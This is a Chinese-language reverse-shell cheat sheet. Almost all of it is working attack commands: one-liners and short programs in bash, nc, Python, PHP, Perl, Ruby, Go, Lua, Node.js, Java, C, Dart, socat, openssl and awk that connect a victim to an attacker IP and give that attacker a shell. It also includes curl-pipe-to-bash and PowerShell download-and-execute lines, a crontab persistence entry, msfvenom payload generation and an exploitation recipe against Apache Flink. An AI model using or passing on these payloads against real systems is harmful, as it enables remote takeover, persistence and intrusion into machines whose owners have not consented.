反弹SHELL的方法
shell分两种一种就是正向shell一种是反向shell 这里拿客户端(攻击者)服务器(受害者)来说 正向shell:攻击者需要连接服务器 客户端通过命令直接连接 反向shell:攻击者需要连接服务器 服务器通过命令来连接客户端 (可以理解为在服务器端去连接客户端)
正向shell
在kali上开启一个终端监听目标主机的端口(例如12345)
nc -lvp 12345 -e /bin/bash
再开启一个终端去连接(192.168.100.100服务器)
nc 192.168.100.100 12345
反向shell
在客户端输入监听命令
nc -lvp 12345
在服务器输入反弹shell命令(192.168.100.101攻击者)
nc 192.168.100.101 12345 -e /bin/sh
这里先说一下python交互式完全命令行shell
当我们去反弹shell获取到后可能是不完全的
所以需要python转换
python -c "import pty;pty.spawn('/bin/bash')"
python2.7反向shell
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192
.168.100.101",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash反向shell
bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
推荐bash64编码使用
PHP反向shell
php -r '$sock=fsockopen("192.168.100.101",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.101/12345 0>&1'");?>
>php -r '$sock=fsockopen("192.168.100.101",12345);>("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);`/bin/sh -i <&3 >&3 2>&3`;'
>php -r '$sock=fsockopen("192.168.100.101",12345);system("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);passthru("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
>php -r '$sock=fsockopen("192.168.100.101",12345);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Perl反向shell
perl -e 'use
Socket;$i="192.168.100.101";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
;if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0、perl反弹shell
用于生成下载脚本的bash命令:
echo use LWP::Simple\;\$url=\"http://0.0.0.0/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl
执行后生成d.pl,再执行d.pl下载r.pl,r.pl(用于反连的perl脚本)如下:
use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"0.0.0.:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}};
>perl -e 'use Socket;$i="192.168.100.101";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.100.101:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.100.101:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' #####windows
AWK反向shell
awk 'BEGIN{s="/inet/tcp/0/192.168.100.101/12345";for(;s|&getline
c;close(c))while(c|getline)print|&s;close(s)}'
nc反向shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
>nc -e /bin/sh 192.168.100.101 12345
>nc -e /bin/bash 192.168.100.101 12345
>nc -c bash 192.168.100.101 12345
>nc -Lp 12345 -vv -e cmd.exe
&
>mknod backpipe p; nc 192.168.100.101 12345 0<backpipe | /bin/bash 1>backpipe
>nc 192.168.100.101 12345
openbsd
>rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
BusyBox
>rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
telnet反向shell
mknod backpipe p; telnet 192.168.100.101 443 0<backpipe | /bin/bash 1>backpipe
ruby反向shell
>ruby -rsocket -e'f=TCPSocket.open("192.168.100.101",12345).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
>ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.100.101","12345");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
Windows
>ruby -rsocket -e 'c=TCPSocket.new("192.168.100.101","12345");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
curl反向shell
1.html内容
/bin/bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
执行
>curl attackerip/1.html|bash
crontab反向shell
* * * * * root bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
socat反向shell
攻击机>socat file:`tty`,raw,echo=0 TCP-L:4242
靶机>/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.100.101:12345
靶机>wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.100.101:12345
Golang反向shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.100.101:12345");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua反向shell
Linux
>lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.100.101','12345');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Windows
>lua5.1 -e 'local host, port = "192.168.100.101", 12345 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
NodeJS反向shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(12345, "192.168.100.101", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh 192.168.100.101 12345')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc 192.168.100.101 12345 -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
Java反向shell
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/192.168.100.101/12345;cat <&5 | while read line; do $line 2>&5 >&5; done'");
p.waitFor();
String host="127.0.0.1";
int port=12345;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Thread thread = new Thread(){
public void run(){
// Reverse shell here
}
}
thread.start();
C反向shell
编译
>gcc /tmp/shell.c --output csh && csh
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4242;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
return 0;
}
Dart反向shell
import 'dart:io';
import 'dart:convert';
main() {
Socket.connect("10.0.0.1", 4242).then((socket) {
socket.listen((data) {
Process.start('powershell.exe', []).then((Process process) {
process.stdin.writeln(new String.fromCharCodes(data).trim());
process.stdout
.transform(utf8.decoder)
.listen((output) { socket.write(output); });
});
},
onDone: () {
socket.destroy();
});
});
}
HTTP反向shell
客户端
# 编写shell脚本并启动http服务器
echo "bash -i >& /dev/tcp/192.168.100.101/12345 0>&1" > shell.sh
python2环境下:python -m SimpleHTTPServer 80
python3环境下:python -m http.server 80
服务器
# 下载shell.sh文件
wget 192.168.35.152/shell.sh
# 执行shell.sh文件
bash shell.sh
whois
# 只能执行指定命令,如whoami命令
whois -h 192.168.100.101 -p 7777 `whoami`
openssl反向shell
# 监听端
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 7777
# or
ncat --ssl -vv -l -p 7777
# 受控端
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.100.101:12345 > /tmp/s; rm /tmp/s
powercat反向shell
项目地址:https://github.com/besimorhino/powercat
System.Net.Webclient.DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.100.101 -p 12345 -e cmd
nishang反向shell
Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。
项目地址:https://github.com/samratashok/nishang
# 将nishang下载到攻击者本地,在目标机使用powershell执行以下命令
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.101/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.100.101 -port 12345
Reverse UDP shell
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.101/nishang/Shells/Invoke-PowerShellUdp.ps1');
Invoke-PowerShellUdp -Reverse -IPAddress 192.168.100.101 -port 12345
MSF 反向shell
# 找出各类反弹一句话payload的路径信息
msfvenom -l payloads | grep 'cmd/windows/reverse'
# 生成反弹shell,复制粘贴到靶机上运行
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.100.101 LPORT=12345
Linux反弹shell小技巧
判断目标存在哪些反弹shell的命令
服务器上执行:whereis bash nc exec telnet python php perl ruby java go gcc g++
目的是确认能够反弹的命令 为后续打下基础
可以测试一下是否能和自己的客户端相通
Apache-flink 未授权访问任意jar包上传反弹shell
影响版本: flink<=1.9.1
利用方法:
msf开启监听
msfvenom -p java/meterpreter/reverse_tcp LHOST=vpsip LPORT=12345 -f jar > flink.jar
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST vpsip
set LPORT 6666
触发条件:
访问ip:port/#/submit/submit
Upload flink.jar之后,点击已上传jar包,submit即可反弹最高权限shell
